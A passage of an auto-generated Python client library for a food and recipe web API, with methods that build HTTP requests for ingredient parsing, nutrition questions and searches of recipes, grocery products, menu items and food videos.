# verify the required parameter 'servings' is set
if ('servings' not in local_var_params or
local_var_params['servings'] is None):
raise ApiValueError("Missing the required parameter `servings` when calling `parse_ingredients`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'ingredient_list' in local_var_params:
form_params.append(('ingredientList', local_var_params['ingredient_list'])) # noqa: E501
if 'servings' in local_var_params:
form_params.append(('servings', local_var_params['servings'])) # noqa: E501
if 'include_nutrition' in local_var_params:
form_params.append(('includeNutrition', local_var_params['include_nutrition'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/parseIngredients', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def quick_answer(self, q, **kwargs): # noqa: E501
"""Quick Answer # noqa: E501
Answer a nutrition related natural language question. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.quick_answer(q, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str q: The nutrition related question. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.quick_answer_with_http_info(q, **kwargs) # noqa: E501
else:
(data) = self.quick_answer_with_http_info(q, **kwargs) # noqa: E501
return data
def quick_answer_with_http_info(self, q, **kwargs): # noqa: E501
"""Quick Answer # noqa: E501
Answer a nutrition related natural language question. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.quick_answer_with_http_info(q, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str q: The nutrition related question. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['q'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method quick_answer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'q' is set
if ('q' not in local_var_params or
local_var_params['q'] is None):
raise ApiValueError("Missing the required parameter `q` when calling `quick_answer`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'q' in local_var_params:
query_params.append(('q', local_var_params['q'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/quickAnswer', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def search_all_food(self, query, **kwargs): # noqa: E501
"""Search All Food # noqa: E501
Search all food content with one call. That includes recipes, grocery products, menu items, simple foods (ingredients), and food videos. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_all_food(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The search query. (required)
:param float offset: The number of results to skip (between 0 and 990).
:param float number: The number of expected results (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_all_food_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.search_all_food_with_http_info(query, **kwargs) # noqa: E501
return data
def search_all_food_with_http_info(self, query, **kwargs): # noqa: E501
"""Search All Food # noqa: E501
Search all food content with one call. That includes recipes, grocery products, menu items, simple foods (ingredients), and food videos. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_all_food_with_http_info(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The search query. (required)
:param float offset: The number of results to skip (between 0 and 990).
:param float number: The number of expected results (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query', 'offset', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search_all_food" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `search_all_food`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/search', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def search_custom_foods(self, query, username, hash, **kwargs): # noqa: E501
"""Search Custom Foods # noqa: E501
Search custom foods in a user's account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_custom_foods(query, username, hash, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The search query. (required)
:param str username: The username. (required)
:param str hash: The private hash for the username. (required)
:param float offset: The number of results to skip (between 0 and 990).
:param float number: The number of expected results (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_custom_foods_with_http_info(query, username, hash, **kwargs) # noqa: E501
else:
(data) = self.search_custom_foods_with_http_info(query, username, hash, **kwargs) # noqa: E501
return data
def search_custom_foods_with_http_info(self, query, username, hash, **kwargs): # noqa: E501
"""Search Custom Foods # noqa: E501
Search custom foods in a user's account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_custom_foods_with_http_info(query, username, hash, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The search query. (required)
:param str username: The username. (required)
:param str hash: The private hash for the username. (required)
:param float offset: The number of results to skip (between 0 and 990).
:param float number: The number of expected results (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query', 'username', 'hash', 'offset', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search_custom_foods" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `search_custom_foods`") # noqa: E501
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `search_custom_foods`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `search_custom_foods`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'username' in local_var_params:
query_params.append(('username', local_var_params['username'])) # noqa: E501
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/customFoods/search', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def search_food_videos(self, query, **kwargs): # noqa: E501
"""Search Food Videos # noqa: E501
Find recipe and other food related videos. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_food_videos(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The search query. (required)
:param str type: The type of the recipes. See a full list of supported meal types.
:param str cuisine: The cuisine(s) of the recipes. One or more, comma separated. See a full list of supported cuisines.
:param str diet: The diet for which the recipes must be suitable. See a full list of supported diets.
:param str include_ingredients: A comma-separated list of ingredients that the recipes should contain.
:param str exclude_ingredients: A comma-separated list of ingredients or ingredient types that the recipes must not contain.
:param float min_length: Minimum video length in seconds.
:param float max_length: Maximum video length in seconds.
:param float offset: The number of results to skip (between 0 and 900).
:param float number: The number of results to return (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_food_videos_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.search_food_videos_with_http_info(query, **kwargs) # noqa: E501
return data
def search_food_videos_with_http_info(self, query, **kwargs): # noqa: E501
"""Search Food Videos # noqa: E501
Find recipe and other food related videos. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_food_videos_with_http_info(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The search query. (required)
:param str type: The type of the recipes. See a full list of supported meal types.
:param str cuisine: The cuisine(s) of the recipes. One or more, comma separated. See a full list of supported cuisines.
:param str diet: The diet for which the recipes must be suitable. See a full list of supported diets.
:param str include_ingredients: A comma-separated list of ingredients that the recipes should contain.
:param str exclude_ingredients: A comma-separated list of ingredients or ingredient types that the recipes must not contain.
:param float min_length: Minimum video length in seconds.
:param float max_length: Maximum video length in seconds.
:param float offset: The number of results to skip (between 0 and 900).
:param float number: The number of results to return (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query', 'type', 'cuisine', 'diet', 'include_ingredients', 'exclude_ingredients', 'min_length', 'max_length', 'offset', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search_food_videos" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `search_food_videos`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'type' in local_var_params:
query_params.append(('type', local_var_params['type'])) # noqa: E501
if 'cuisine' in local_var_params:
query_params.append(('cuisine', local_var_params['cuisine'])) # noqa: E501
if 'diet' in local_var_params:
query_params.append(('diet', local_var_params['diet'])) # noqa: E501
if 'include_ingredients' in local_var_params:
query_params.append(('includeIngredients', local_var_params['include_ingredients'])) # noqa: E501
if 'exclude_ingredients' in local_var_params:
query_params.append(('excludeIngredients', local_var_params['exclude_ingredients'])) # noqa: E501
if 'min_length' in local_var_params:
query_params.append(('minLength', local_var_params['min_length'])) # noqa: E501
if 'max_length' in local_var_params:
query_params.append(('maxLength', local_var_params['max_length'])) # noqa: E501
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/videos/search', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def search_grocery_products(self, query, **kwargs): # noqa: E501
"""Search Grocery Products # noqa: E501
Search packaged food products, such as frozen pizza or Greek yogurt. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_grocery_products(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The search query. (required)
:param float min_calories: The minimum amount of calories the product must have.
:param float max_calories: The maximum amount of calories the product can have.
:param float min_carbs: The minimum amount of carbohydrates in grams the product must have.
:param float max_carbs: The maximum amount of carbohydrates in grams the product can have.
:param float min_protein: The minimum amount of protein in grams the product must have.
:param float max_protein: The maximum amount of protein in grams the product can have.
:param float min_fat: The minimum amount of fat in grams the product must have.
:param float max_fat: The maximum amount of fat in grams the product can have.
:param float offset: The number of results to skip (between 0 and 990).
:param float number: The number of expected results (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_grocery_products_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.search_grocery_products_with_http_info(query, **kwargs) # noqa: E501
return data
def search_grocery_products_with_http_info(self, query, **kwargs): # noqa: E501
"""Search Grocery Products # noqa: E501
Search packaged food products, such as frozen pizza or Greek yogurt. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_grocery_products_with_http_info(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The search query. (required)
:param float min_calories: The minimum amount of calories the product must have.
:param float max_calories: The maximum amount of calories the product can have.
:param float min_carbs: The minimum amount of carbohydrates in grams the product must have.
:param float max_carbs: The maximum amount of carbohydrates in grams the product can have.
:param float min_protein: The minimum amount of protein in grams the product must have.
:param float max_protein: The maximum amount of protein in grams the product can have.
:param float min_fat: The minimum amount of fat in grams the product must have.
:param float max_fat: The maximum amount of fat in grams the product can have.
:param float offset: The number of results to skip (between 0 and 990).
:param float number: The number of expected results (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query', 'min_calories', 'max_calories', 'min_carbs', 'max_carbs', 'min_protein', 'max_protein', 'min_fat', 'max_fat', 'offset', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search_grocery_products" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `search_grocery_products`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'min_calories' in local_var_params:
query_params.append(('minCalories', local_var_params['min_calories'])) # noqa: E501
if 'max_calories' in local_var_params:
query_params.append(('maxCalories', local_var_params['max_calories'])) # noqa: E501
if 'min_carbs' in local_var_params:
query_params.append(('minCarbs', local_var_params['min_carbs'])) # noqa: E501
if 'max_carbs' in local_var_params:
query_params.append(('maxCarbs', local_var_params['max_carbs'])) # noqa: E501
if 'min_protein' in local_var_params:
query_params.append(('minProtein', local_var_params['min_protein'])) # noqa: E501
if 'max_protein' in local_var_params:
query_params.append(('maxProtein', local_var_params['max_protein'])) # noqa: E501
if 'min_fat' in local_var_params:
query_params.append(('minFat', local_var_params['min_fat'])) # noqa: E501
if 'max_fat' in local_var_params:
query_params.append(('maxFat', local_var_params['max_fat'])) # noqa: E501
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/products/search', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def search_grocery_products_by_upc(self, upc, **kwargs): # noqa: E501
"""Search Grocery Products by UPC # noqa: E501
Get information about a packaged food using its UPC. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_grocery_products_by_upc(upc, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float upc: The product's UPC. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_grocery_products_by_upc_with_http_info(upc, **kwargs) # noqa: E501
else:
(data) = self.search_grocery_products_by_upc_with_http_info(upc, **kwargs) # noqa: E501
return data
def search_grocery_products_by_upc_with_http_info(self, upc, **kwargs): # noqa: E501
"""Search Grocery Products by UPC # noqa: E501
Get information about a packaged food using its UPC. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_grocery_products_by_upc_with_http_info(upc, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float upc: The product's UPC. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['upc'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search_grocery_products_by_upc" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'upc' is set
if ('upc' not in local_var_params or
local_var_params['upc'] is None):
raise ApiValueError("Missing the required parameter `upc` when calling `search_grocery_products_by_upc`") # noqa: E501
collection_formats = {}
path_params = {}
if 'upc' in local_var_params:
path_params['upc'] = local_var_params['upc'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/products/upc/{upc}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def search_menu_items(self, query, **kwargs): # noqa: E501
"""Search Menu Items # noqa: E501
Search over 115,000 menu items from over 800 fast food and chain restaurants. For example, McDonald's Big Mac or Starbucks Mocha. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_menu_items(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The search query. (required)
:param float min_calories: The minimum amount of calories the menu item must have.
:param float max_calories: The maximum amount of calories the menu item can have.
:param float min_carbs: The minimum amount of carbohydrates in grams the menu item must have.
:param float max_carbs: The maximum amount of carbohydrates in grams the menu item can have.
:param float min_protein: The minimum amount of protein in grams the menu item must have.
:param float max_protein: The maximum amount of protein in grams the menu item can have.
:param float min_fat: The minimum amount of fat in grams the menu item must have.
:param float max_fat: The maximum amount of fat in grams the menu item can have.
:param float offset: The offset number for paging (between 0 and 990).
:param float number: The number of expected results (between 1 and 10).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_menu_items_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.search_menu_items_with_http_info(query, **kwargs) # noqa: E501
return data
def search_menu_items_with_http_info(self, query, **kwargs): # noqa: E501
"""Search Menu Items # noqa: E501
Search over 115,000 menu items from over 800 fast food and chain restaurants. For example, McDonald's Big Mac or Starbucks Mocha. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_menu_items_with_http_info(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The search query. (required)
:param float min_calories: The minimum amount of calories the menu item must have.
:param float max_calories: The maximum amount of calories the menu item can have.
:param float min_carbs: The minimum amount of carbohydrates in grams the menu item must have.
:param float max_carbs: The maximum amount of carbohydrates in grams the menu item can have.
:param float min_protein: The minimum amount of protein in grams the menu item must have.
:param float max_protein: The maximum amount of protein in grams the menu item can have.
:param float min_fat: The minimum amount of fat in grams the menu item must have.
:param float max_fat: The maximum amount of fat in grams the menu item can have.
:param float offset: The offset number for paging (between 0 and 990).
:param float number: The number of expected results (between 1 and 10).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query', 'min_calories', 'max_calories', 'min_carbs', 'max_carbs', 'min_protein', 'max_protein', 'min_fat', 'max_fat', 'offset', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search_menu_items" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `search_menu_items`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'min_calories' in local_var_params:
query_params.append(('minCalories', local_var_params['min_calories'])) # noqa: E501
if 'max_calories' in local_var_params:
query_params.append(('maxCalories', local_var_params['max_calories'])) # noqa: E501
if 'min_carbs' in local_var_params:
query_params.append(('minCarbs', local_var_params['min_carbs'])) # noqa: E501
if 'max_carbs' in local_var_params:
query_params.append(('maxCarbs', local_var_params['max_carbs'])) # noqa: E501
if 'min_protein' in local_var_params:
query_params.append(('minProtein', local_var_params['min_protein'])) # noqa: E501
if 'max_protein' in local_var_params:
query_params.append(('maxProtein', local_var_params['max_protein'])) # noqa: E501
if 'min_fat' in local_var_params:
query_params.append(('minFat', local_var_params['min_fat'])) # noqa: E501
if 'max_fat' in local_var_params:
query_params.append(('maxFat', local_var_params['max_fat'])) # noqa: E501
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/menuItems/search', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def search_recipes(self, query, **kwargs): # noqa: E501
"""Search Recipes # noqa: E501
Search through hundreds of thousands of recipes using advanced filtering and ranking. NOTE: This method combines searching by query, by ingredients, and by nutrients into one endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_recipes(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The (natural language) recipe search query. (required)
:param str cuisine: The cuisine(s) of the recipes. One or more, comma separated (will be interpreted as 'OR'). See a full list of supported cuisines.
:param str exclude_cuisine: The cuisine(s) the recipes must not match. One or more, comma separated (will be interpreted as 'AND'). See a full list of supported cuisines.
:param str diet: The diet for which the recipes must be suitable. See a full list of supported diets.
:param str intolerances: A comma-separated list of intolerances. All recipes returned must not contain ingredients that are not suitable for people with the intolerances entered. See a full list of supported intolerances.
:param str equipment: The equipment required. Multiple values will be interpreted as 'or'. For example, value could be \"blender, frying pan, bowl\".
:param str include_ingredients: A comma-separated list of ingredients that should/must be used in the recipes.
:param str exclude_ingredients: A comma-separated list of ingredients or ingredient types that the recipes must not contain.
:param str type: The type of recipe. See a full list of supported meal types.
:param bool instructions_required: Whether the recipes must have instructions.
:param bool fill_ingredients: Add information about the ingredients and whether they are used or missing in relation to the query.
:param bool add_recipe_information: If set to true, you get more information about the recipes returned.
:param bool add_recipe_nutrition: If set to true, you get nutritional information about each recipes returned.
:param str author: The username of the recipe author.
:param str tags: User defined tags that have to match. The author param has to be set.
:param float recipe_box_id: The id of the recipe box to which the search should be limited to.
:param str title_match: Enter text that must be found in the title of the recipes.
:param float max_ready_time: The maximum time in minutes it should take to prepare and cook the recipe.
:param bool ignore_pantry: Whether to ignore typical pantry items, such as water, salt, flour, etc.
:param str sort: The strategy to sort recipes by. See a full list of supported sorting options.
:param str sort_direction: The direction in which to sort. Must be either 'asc' (ascending) or 'desc' (descending).
:param float min_carbs: The minimum amount of carbohydrates in grams the recipe must have.
:param float max_carbs: The maximum amount of carbohydrates in grams the recipe can have.
:param float min_protein: The minimum amount of protein in grams the recipe must have.
:param float max_protein: The maximum amount of protein in grams the recipe can have.
:param float min_calories: The minimum amount of calories the recipe must have.
:param float max_calories: The maximum amount of calories the recipe can have.
:param float min_fat: The minimum amount of fat in grams the recipe must have.
:param float max_fat: The maximum amount of fat in grams the recipe can have.
:param float min_alcohol: The minimum amount of alcohol in grams the recipe must have.
:param float max_alcohol: The maximum amount of alcohol in grams the recipe can have.
:param float min_caffeine: The minimum amount of caffeine in milligrams the recipe must have.
:param float max_caffeine: The maximum amount of caffeine in milligrams the recipe can have.
:param float min_copper: The minimum amount of copper in milligrams the recipe must have.
:param float max_copper: The maximum amount of copper in milligrams the recipe can have.
:param float min_calcium: The minimum amount of calcium in milligrams the recipe must have.
:param float max_calcium: The maximum amount of calcium in milligrams the recipe can have.
:param float min_choline: The minimum amount of choline in milligrams the recipe must have.
:param float max_choline: The maximum amount of choline in milligrams the recipe can have.
:param float min_cholesterol: The minimum amount of cholesterol in milligrams the recipe must have.
:param float max_cholesterol: The maximum amount of cholesterol in milligrams the recipe can have.
:param float min_fluoride: The minimum amount of fluoride in milligrams the recipe must have.
:param float max_fluoride: The maximum amount of fluoride in milligrams the recipe can have.
:param float min_saturated_fat: The minimum amount of saturated fat in grams the recipe must have.
:param float max_saturated_fat: The maximum amount of saturated fat in grams the recipe can have.
:param float min_vitamin_a: The minimum amount of Vitamin A in IU the recipe must have.
:param float max_vitamin_a: The maximum amount of Vitamin A in IU the recipe can have.
:param float min_vitamin_c: The minimum amount of Vitamin C milligrams the recipe must have.
:param float max_vitamin_c: The maximum amount of Vitamin C in milligrams the recipe can have.
:param float min_vitamin_d: The minimum amount of Vitamin D in micrograms the recipe must have.
:param float max_vitamin_d: The maximum amount of Vitamin D in micrograms the recipe can have.
:param float min_vitamin_e: The minimum amount of Vitamin E in milligrams the recipe must have.
:param float max_vitamin_e: The maximum amount of Vitamin E in milligrams the recipe can have.
:param float min_vitamin_k: The minimum amount of Vitamin K in micrograms the recipe must have.
:param float max_vitamin_k: The maximum amount of Vitamin K in micrograms the recipe can have.
:param float min_vitamin_b1: The minimum amount of Vitamin B1 in milligrams the recipe must have.
:param float max_vitamin_b1: The maximum amount of Vitamin B1 in milligrams the recipe can have.
:param float min_vitamin_b2: The minimum amount of Vitamin B2 in milligrams the recipe must have.
